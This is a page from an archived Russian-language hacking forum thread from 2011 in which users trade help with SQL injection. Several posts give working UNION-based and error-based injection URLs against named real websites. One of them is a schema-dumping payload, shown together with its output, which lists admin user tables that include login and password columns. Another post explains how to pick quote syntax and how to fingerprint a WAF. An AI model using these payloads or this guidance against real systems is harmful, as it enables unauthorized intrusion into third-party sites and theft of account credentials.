HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1766 из 2438 « Первая < 7661266166617161756 1762 1763 1764 1765 1766 1767 1768 1769 1770 1776181618662266 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17651  
Старый 22.07.2011, 10:27
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию
Мне бы расписать почему при

http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ данные выводятся

http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)данные не выводятся

как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку
 
Ответить с цитированием

  #17652  
Старый 22.07.2011, 10:28
contreil
Новичок
Регистрация: 11.07.2008
Сообщений: 7
Провел на форуме:
189793

Репутация: 0
По умолчанию
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?
 
Ответить с цитированием

  #17653  
Старый 22.07.2011, 10:30
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию
Цитата:
Сообщение от contreil  
contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?
Идиотский вопрос такой)))) Спроси кто сервер админит.
 
Ответить с цитированием

  #17654  
Старый 22.07.2011, 10:52
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от contreil  
contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?
если ты имеешь ввиду WAF, то смотреть коды возвращаемых ошибок, куки; либо задетектить стандартные правила, характерные для конкретного WAF'a. Если же ты говоришь о том, что непосредственно защищает сам сервер, то порутать его и посмотреть что на нём запущенно.

Цитата:
Сообщение от None  
тогда как количество солбцов подобрать
с помощью order by
статью прочитать.
 
Ответить с цитированием

  #17655  
Старый 22.07.2011, 11:08
contreil
Новичок
Регистрация: 11.07.2008
Сообщений: 7
Провел на форуме:
189793

Репутация: 0
По умолчанию
Цитата:
Сообщение от heks  
heks said:
Идиотский вопрос такой)))) Спроси кто сервер админит.
И на этом спасибо!
 
Ответить с цитированием

  #17656  
Старый 22.07.2011, 11:08
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию
Цитата:
Сообщение от heks  
heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку
Ы, кавычку нужно писать, когда переменная имеет тип string. Чтобы выйти из значения переменной и дописать свой SQL запрос. А когда переменная типа integer - кавычка ни в коем случае не нужна! И еще нужно помнить, что когда переменная типа string мы всегда должны в конце ставить комментарий ( -- ), чтобы убрать лишнюю кавычку, которая осталась.
 
Ответить с цитированием

  #17657  
Старый 22.07.2011, 11:22
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от heks  
heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку
ну в статьях как бы всё расписано(даже если не написано и ты не можешь понять, то наверно надо изучать не с этого)

1. Ковычка используется при запросах вида

"SELECT * FROM table WHERE param='".$_GET['param']."'"

ковычкой мы закрываем предыдущую ковычку.

Проверить просто:

http://www.riviera-crimea.com/detail.php?id=421+and+1=1 - отображает

http://www.riviera-crimea.com/detail.php?id=421+and+1=2 - отображает

значит мы не влияем на запрос, т. к. мы должны были получить пустой результат 421+and+1=2 (true and false = false)

"SELECT * FROM table WHERE param='421 and 1=2'"

2. С кавычкой

http://www.riviera-crimea.com/detail.php?id=421'+and+1=1--+ - отображает

http://www.riviera-crimea.com/detail.php?id=421'+and+1=2--+ - не отображает

значит запрос составлен верно

"SELECT * FROM table WHERE param='421' and 1=2--+'"

3. -421 это то вместо чего я использую 421 and 1=2(что как и -421 возвращает пустой запрос и можно вписать свой через union select)
 
Ответить с цитированием

  #17658  
Старый 22.07.2011, 19:30
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию
может кто помочь или нет?

Код:
Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 #
не могу даже название бд узнать
 
Ответить с цитированием

  #17659  
Старый 22.07.2011, 22:19
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от Faaax  
Faaax said:
может кто помочь или нет?
Код:
Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 #
не могу даже название бд узнать
параметры(те что отсылаются при нажатии кнопки "оплата") для поста на корень сайта

Код:
Code:
action=pay&id=213123'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x   from information_schema.tables group by x)a)--+'&email=a%40a.ru&submit_button=%CE%CF%CB%C0%D2%C0
юзается Error-based SQL-Injection, вместо version() подставлять (select 1) или (select group_concat(table_name) from information_schema.tables), ну и так далее
 
Ответить с цитированием

  #17660  
Старый 22.07.2011, 22:36
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от Faaax  
Faaax said:
может кто помочь или нет?
Код:
Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 #
не могу даже название бд узнать
В чем собственно проблема? Вывод в исходнике:

Код:
Code:
www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,"\r\n",table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--+'1
Код:
Code:
vsemayki_ru.admin_stat:id
vsemayki_ru.admin_stat:data
vsemayki_ru.admin_stat:name
vsemayki_ru.admin_user:ID
vsemayki_ru.admin_user:LOGIN
vsemayki_ru.admin_user:PASSWORD
vsemayki_ru.admin_user:NAME
vsemayki_ru.admin_user:EMAIL
vsemayki_ru.admin_user:ACTIVE
vsemayki_ru.admin_user:DATE_LAST
vsemayki_ru.admin_user:ISADMIN
vsemayki_ru.admin_user:IP
vsemayki_ru.admin_user:stage2
vsemayki_ru.admin_user:stage3
vsemayki_ru.admin_user:stage4
vsemayki_ru.admin_user:stage5
vsemayki_ru.admin_user:stage6
vsemayki_ru.admin_user:stage7
vsemayki_ru.admin_user:stage8
vsemayki_ru.admin_user:stage9
vsemayki_ru.admin_user:stage10
vsemayki_ru.admin_user:stage11
vsemayki_ru.admin_user:stage12
vsemayki_ru.admin_user:stage13
vsemayki_ru.admin_user:stage14
vsemayki_ru.admin_user:stage15
vsemayki_ru.admin_user:stage16
vsemayki_ru.admin_user:stage17
vsemayki_ru.admin_user:stage18
vsemayki_ru.admin_user:sklad
vsemayki_ru.admin_user:stage19
vsemayki_ru.admin_user:stages20
vsemayki_ru.admin_user:stages21
vsemayki_ru.admin_user:stages22
vsemayki_ru.admin_user:department
vsemayki_ru.admin_user:phone
vsemayki_ru.admin_user_login:admin_login_id
vsemayki_ru.admin_user_login:parent
vsemayki_ru.admin_user_login:datetime
vsemayki_ru.admin_user_login:ip
vsemayki_ru.admin_user_login:type
vsemayki_ru.admin_user_login:succes
vsemayki_ru.admin_user_parts:ID
vsemayki_ru.admin_user_parts:admin_user
vsemayki_ru.admin_user_parts:module
vsemayki_ru.admin_user_parts:module_key
vsemayki_ru.admin_user_parts:iswrite
 
Ответить с цитированием
Ответ
Страница 1766 из 2438 « Первая < 7661266166617161756 1762 1763 1764 1765 1766 1767 1768 1769 1770 1776181618662266 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ